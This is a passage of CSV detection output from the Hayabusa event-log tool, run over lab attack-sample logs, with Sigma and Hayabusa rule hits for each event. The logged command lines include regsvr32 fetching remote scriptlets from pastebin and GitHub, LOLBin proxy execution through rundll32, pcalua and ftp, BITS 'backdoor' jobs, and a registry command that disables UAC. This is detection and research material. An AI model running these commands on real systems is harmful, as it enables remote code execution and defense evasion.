c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx -2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx -2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx -2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 